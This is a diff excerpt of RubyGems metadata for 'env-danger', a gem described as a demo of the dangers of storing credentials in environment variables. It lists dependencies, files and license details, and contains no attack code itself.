|
96
|
+
version: 3.2.0.pre
|
97
|
+
- !ruby/object:Gem::Dependency
|
98
|
+
name: rspec-expectations
|
99
|
+
requirement: !ruby/object:Gem::Requirement
|
100
|
+
requirements:
|
101
|
+
- - "~>"
|
102
|
+
- !ruby/object:Gem::Version
|
103
|
+
version: 3.2.0.pre
|
104
|
+
type: :development
|
105
|
+
prerelease: false
|
106
|
+
version_requirements: !ruby/object:Gem::Requirement
|
107
|
+
requirements:
|
108
|
+
- - "~>"
|
109
|
+
- !ruby/object:Gem::Version
|
110
|
+
version: 3.2.0.pre
|
111
|
+
- !ruby/object:Gem::Dependency
|
112
|
+
name: rspec-support
|
113
|
+
requirement: !ruby/object:Gem::Requirement
|
114
|
+
requirements:
|
115
|
+
- - "~>"
|
116
|
+
- !ruby/object:Gem::Version
|
117
|
+
version: 3.2.0.pre
|
118
|
+
type: :development
|
119
|
+
prerelease: false
|
120
|
+
version_requirements: !ruby/object:Gem::Requirement
|
121
|
+
requirements:
|
122
|
+
- - "~>"
|
123
|
+
- !ruby/object:Gem::Version
|
124
|
+
version: 3.2.0.pre
|
125
|
+
- !ruby/object:Gem::Dependency
|
126
|
+
name: rspec-mocks
|
127
|
+
requirement: !ruby/object:Gem::Requirement
|
128
|
+
requirements:
|
129
|
+
- - "~>"
|
130
|
+
- !ruby/object:Gem::Version
|
131
|
+
version: 3.2.0.pre
|
132
|
+
type: :development
|
133
|
+
prerelease: false
|
134
|
+
version_requirements: !ruby/object:Gem::Requirement
|
135
|
+
requirements:
|
136
|
+
- - "~>"
|
137
|
+
- !ruby/object:Gem::Version
|
138
|
+
version: 3.2.0.pre
|
139
|
+
- !ruby/object:Gem::Dependency
|
140
|
+
name: rspec
|
141
|
+
requirement: !ruby/object:Gem::Requirement
|
142
|
+
requirements:
|
143
|
+
- - "~>"
|
144
|
+
- !ruby/object:Gem::Version
|
145
|
+
version: 3.2.0.pre
|
146
|
+
type: :development
|
147
|
+
prerelease: false
|
148
|
+
version_requirements: !ruby/object:Gem::Requirement
|
149
|
+
requirements:
|
150
|
+
- - "~>"
|
151
|
+
- !ruby/object:Gem::Version
|
152
|
+
version: 3.2.0.pre
|
153
|
+
- !ruby/object:Gem::Dependency
|
154
|
+
name: simplecov
|
155
|
+
requirement: !ruby/object:Gem::Requirement
|
156
|
+
requirements:
|
157
|
+
- - ">="
|
158
|
+
- !ruby/object:Gem::Version
|
159
|
+
version: '0'
|
160
|
+
type: :development
|
161
|
+
prerelease: false
|
162
|
+
version_requirements: !ruby/object:Gem::Requirement
|
163
|
+
requirements:
|
164
|
+
- - ">="
|
165
|
+
- !ruby/object:Gem::Version
|
166
|
+
version: '0'
|
167
|
+
- !ruby/object:Gem::Dependency
|
168
|
+
name: coveralls
|
169
|
+
requirement: !ruby/object:Gem::Requirement
|
170
|
+
requirements:
|
171
|
+
- - ">="
|
172
|
+
- !ruby/object:Gem::Version
|
173
|
+
version: '0'
|
174
|
+
type: :development
|
175
|
+
prerelease: false
|
176
|
+
version_requirements: !ruby/object:Gem::Requirement
|
177
|
+
requirements:
|
178
|
+
- - ">="
|
179
|
+
- !ruby/object:Gem::Version
|
180
|
+
version: '0'
|
181
|
+
- !ruby/object:Gem::Dependency
|
182
|
+
name: webmock
|
183
|
+
requirement: !ruby/object:Gem::Requirement
|
184
|
+
requirements:
|
185
|
+
- - ">="
|
186
|
+
- !ruby/object:Gem::Version
|
187
|
+
version: '0'
|
188
|
+
type: :development
|
189
|
+
prerelease: false
|
190
|
+
version_requirements: !ruby/object:Gem::Requirement
|
191
|
+
requirements:
|
192
|
+
- - ">="
|
193
|
+
- !ruby/object:Gem::Version
|
194
|
+
version: '0'
|
195
|
+
description: |-
|
196
|
+
Demonstrates the dangers of using
|
197
|
+
ENV to store credentials
|
198
|
+
email: tibbon@gmail.com
|
199
|
+
executables: []
|
200
|
+
extensions: []
|
201
|
+
extra_rdoc_files:
|
202
|
+
- LICENSE.txt
|
203
|
+
- README.md
|
204
|
+
files:
|
205
|
+
- ".document"
|
206
|
+
- ".rspec"
|
207
|
+
- Gemfile
|
208
|
+
- Gemfile.lock
|
209
|
+
- LICENSE.txt
|
210
|
+
- README.md
|
211
|
+
- Rakefile
|
212
|
+
- VERSION
|
213
|
+
- env-danger.gemspec
|
214
|
+
- lib/env-danger.rb
|
215
|
+
- lib/env-danger/danger.rb
|
216
|
+
- lib/env-danger/version.rb
|
217
|
+
- spec/danger_spec.rb
|
218
|
+
- spec/fixtures/env_example.json
|
219
|
+
- spec/spec_helper.rb
|
220
|
+
homepage: http://github.com/tibbon/env-danger
|
221
|
+
licenses:
|
222
|
+
- MIT
|
223
|
+
metadata: {}
|
224
|
+
post_install_message:
|
225
|
+
rdoc_options: []
|
226
|
+
require_paths:
|
227
|
+
- lib
|
228
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
229
|
+
requirements:
|
230
|
+
- - ">="
|
231
|
+
- !ruby/object:Gem::Version
|
232
|
+
version: '0'
|
233
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
234
|
+
requirements:
|
235
|
+
- - ">="
|
236
|
+
- !ruby/object:Gem::Version
|
237
|
+
version: '0'
|
238
|
+
requirements: []
|
239
|
+
rubyforge_project:
|
240
|
+
rubygems_version: 2.2.2
|
241
|
+
signing_key:
|
242
|
+
specification_version: 4
|
243
|
+
summary: Do not install, a security-hole demo only
|
244
|
+
test_files: []
|